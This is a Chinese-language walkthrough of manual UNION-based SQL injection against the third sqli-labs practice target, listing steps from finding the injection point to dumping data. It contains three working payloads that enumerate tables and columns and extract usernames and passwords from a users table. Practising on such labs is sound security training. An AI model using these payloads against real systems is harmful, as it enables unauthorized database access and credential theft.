get型union联合一般注入流程

sqllibs下第三个靶场union select 的手注一般过程

1 寻找注入点  靶场已知注入点为 id

 

 

 

 2 判断闭合方式  

如果是错误的闭合  一开始报错  加上注释符后依然报错

反之是正确的闭合   一开始也会报错  加上注释符后就不会报错了

可以通过报错提示  寻找闭合方式

 

 

 

 

 

 

 

 

 

 

 

 

 3 确定数据库的列数  二分法

 

 

 

 

 

 

 此时需要验证是否是2列  

 

 

 

 

所以是三列    最后是  id username  passwd

4确认报错位  查询一个数据库库不存在的数据

 

 

 

 

 可知 2 3  是报错位

5刺探数据库  union select 联合查询语句

 

 

 

 

 

 

 

 

 6  查询数据库下的表

 

 

 

 

 

 

 ?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

7查询数据库下的表下的栏目

 

 

 

 

 

 

 

 

 

 

 ?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security'and table_name='users'--+

8查询字段  即每列的数据

 

 

 

 

 ?id=-1') union select 1,group_concat(username),group_concat(password) from users--+